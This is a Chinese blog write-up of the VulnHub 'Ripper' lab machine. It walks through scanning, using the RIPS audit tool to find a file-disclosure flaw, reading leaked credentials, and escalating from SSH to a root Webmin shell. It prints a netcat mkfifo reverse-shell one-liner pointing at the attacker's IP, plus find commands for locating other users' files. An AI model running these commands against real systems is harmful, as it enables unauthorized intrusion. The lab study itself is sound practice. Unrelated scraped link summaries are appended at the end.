靶场搭建

靶场下载地址:https://download.vulnhub.com/ripper/Ripper.ova

下载下来是虚拟机.ovf压缩文件,这个靶机是VirtualBox的,直接用VM打开会报错想要用VM打开可以看我这篇文章:如何将VirtualBox虚拟机转换到VMware中_奋斗吧!小胖子的博客-CSDN博客_virtualbox转vmware

打开后把网络模式设置为NAT模式(桥接模式也可以,和kali攻击机保持一致就可以)

开启虚拟机

靶场搭建完毕

渗透测试

由于不知道靶机ip,所以需要扫描NAT的网段

147为kali攻击机的ip,所以148为靶机ip

扫描靶机端口服务开放情况

开放了22端口,存在SSH服务

开放了80端口存在http服务,且中间件为Apache2.4.29

开放了10000端口,存在http服务,且中间件为MiniServ1.910(Webmin)

先访问一下80端口的WEB

为Apache初始页面

搜索一下敏感目录,使用了不同工具不同字典,但是没有发现其它敏感目录

所以我们先去看一下10000端口的WEB

让我们访问https://bogon:10000。,所以我们需要把这个域名添加到hosts文件中

访问发现是Webmin的后台登录页面

先尝试一下是否存在admin/admin/admin123这样的弱口令,发现不存在

搜索一下敏感目录

发现存在robots.txt,里面有一段base64编码

解码

提示说他们用rips扫描php代码

通过搜索知道它是一个PHP源代码审计工具RIPS

并且使用rips,可能会存在rips路径

尝试访问,发现没有

猜测可能是在80端口上,尝试访问,发现果然再80端口上

这是一个代码审计,找是否存在漏洞的自动化工具,所以我们再WEB的根目录(/var/www)扫描,并且勾选扫描子目录选项,进行扫描

扫描成功,查看结果

查找看是否存在可以利用的漏洞,发现存在文件泄露并且存在file参数

尝试利用,发现可以读网站根路径下的文件,但是不能读取web路径以外的路径

发现这个漏洞只能用于读取文件,不会进行解析

所以我们只能尝试去读取一些敏感信息

这个代码审计工具有搜索的功能,尝试看能不能搜索到关于账号密码的信息

搜索发现了一组用户名和密码

ssh服务是开启的,尝试登录,发现登录成功

获得到第一个flag

还发现一个可疑文件,但是为空,好像是让我们sudo提权为admin

但是发现没有sudo命令

在/home目录下发现还存在一个叫做cubes的用户,我们可能需要先提权到这个用户

使用其它方式提权

需要提权到cubes用户,所以我们现在找cubes权限的文件,并且可以被ripper读的文件

通过命令

find / -user cubes -type f -exec ls -al {} \; 2>/dev/null查看cubes用户权限的文件

发现secret.file文件,查看文件

发现一段密码,猜测是cubes用户的密码,尝试登录,登录成功

尝试再次提权到root,sudo提权、suid提权、内核提权都不行

在尝试通过同样的方法在找找有什么其它特殊文件

发现有很多没用的目录和文件,经过过滤得到结果

find / -user cubes -type f -exec ls -al {} \; 2>/dev/null | grep -v '.png' | grep -v '/proc' | grep -v '/sys'

发现一个miniser.log日志文件

在其中发现一对账号密码

猜测是登录webmin后台的,因为在webmin目录下

尝试登陆,登录成功

在左下角发现可以直接执行命令

发现权限为root

利用这个命令执行再反弹一个shell

先监听端口,然后执行命令

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.52.147 4444 >/tmp/f

获得第二个flag

此版本的webmin也存在rce漏洞,但是也需要账号密码,登陆后也可以通过漏洞来获得shell

VnlnHub Ripper相关推荐

  1. John the Ripper

    John the Ripper John the Ripper(简称John)是一款著名的密码破解工具.它主要针对各种Hash加密的密文.它不同于Rainbow Table方式.它采用实时运算的方式和 ...

  2. RIPPER算法原理

    在众多分类算法中,决策树作为一种基于有监督学习的层次模型被大量使用,其有一种其他算法难以比拟的优点:可解释性强--通过将学习到的决策树可以很轻易的转换成"如果-那么"形式的规则.但 ...

  3. StreamBox Ripper 将rm转mp3时候出现g2支持的问题

    利用StreamBox Ripper(很多网站有下,很小的绿色软件,使用方便)可以将rm格式的 文件转换成mp3格式的文件但是一般大家安装的是realpalyer 10,StreamBox Rippe ...

  4. John the Ripper 密码破解者

    John the Ripper

  5. 利用 John the Ripper 破解用户登录密码

    一.什么是 John the Ripper ? 看到这个标题,想必大家都很好奇,John the Ripper 是个什么东西呢?如果直译其名字的话就是: John 的撕裂者(工具). 相比大家都会觉得 ...

  6. John the Ripper 著名密码破解工具

    著名密码破解工具 John the Ripper 发布了 1.9.0-jumbo-1 版本. John the Ripper 是一款速度很快的密码破解工具,目前可用于 Unix.macOS.Windo ...

  7. Ninja ripper 工具使用教程

    Ninja ripper  是一款用来导出任何安卓游戏的美术资源的工具.理论上可以导出任何游戏的模型,贴图.因为他的原理,不是解密程序,而是在运行时,接管D3D的API,从渲染API的参数中,获取美术 ...

  8. ninja ripper新版教程

    之前的ninja ripper因为版本太旧了,对新的游戏可能支持不好,加上发现自己原本的教程也有一些问题,因此在这里重新写个新的教程_(:зゝ∠)_ 这个教程是以目前的最新版ninja ripper ...

  9. 还在寻找一款DVD全能转换器吗?WinX DVD Ripper for Mac它不香吗?

    适用于Mac的WinX DVD Ripper (V6.2.0 Dec-13-2018)备份和翻录DVD到Mac iTunes iPhone iPod iPad Android具有顶级质量适用于Mac的 ...

最新文章

  1. 适配器模式:我真的不难
  2. Hello World With JBoss Modules
  3. Java 对比Vector、ArrayList、LinkedList
  4. AI基础:数据增强方法综述
  5. hierarchy change in CRM - step1 inbound CSAIBASE queue
  6. Python爬虫 senlenium爬取拉勾网招聘数据,你学会了吗
  7. iframe高度自适应
  8. 淘宝开放平台正式环境获取数据(一)
  9. 获取文件当前地址GetModuleFileName函数
  10. 再看经典推荐算法之召回算法
  11. C++ Segmentation fault 一般原因
  12. HDU 1054 Strategic Game(无向二分图的最大匹配)
  13. java生成离散型随机数_几种随机数生成方式
  14. windows进程/线程创建过程 --- windows操作系统学习
  15. STM32驱动SG90舵机
  16. 原来清理手机内存,使用管家是不够的!还需删除这4个文件夹
  17. Excel中的STDEV.P和STDEV.S函数的区别
  18. “3D游戏之父”考古“诺基亚时代”手游,网友:求支持智能手机!
  19. C++语言入门3(定义整数与整数输入)
  20. 计算机视觉传达论文库,计算机图形视觉传达论文

热门文章

  1. 【php】empty()详解
  2. 关于工作经验积累到底是积累的什么?
  3. 彻底关闭烦人的---FF新推荐
  4. 什么是数据可视化?企业如何进行数据可视化?
  5. 做人要心正,待人要心诚
  6. 基于matlab fdma传输系统设计,基于matlab频分复用系统的研究与仿真设计3695.doc
  7. 远程访问MySql数据库的方法
  8. Latex中IOP模板下amsmath包报错
  9. 卷积神经网络中Attention注意力机制(CBAM)
  10. 上拉(Pull Up )或下拉(Pull Down)电阻详解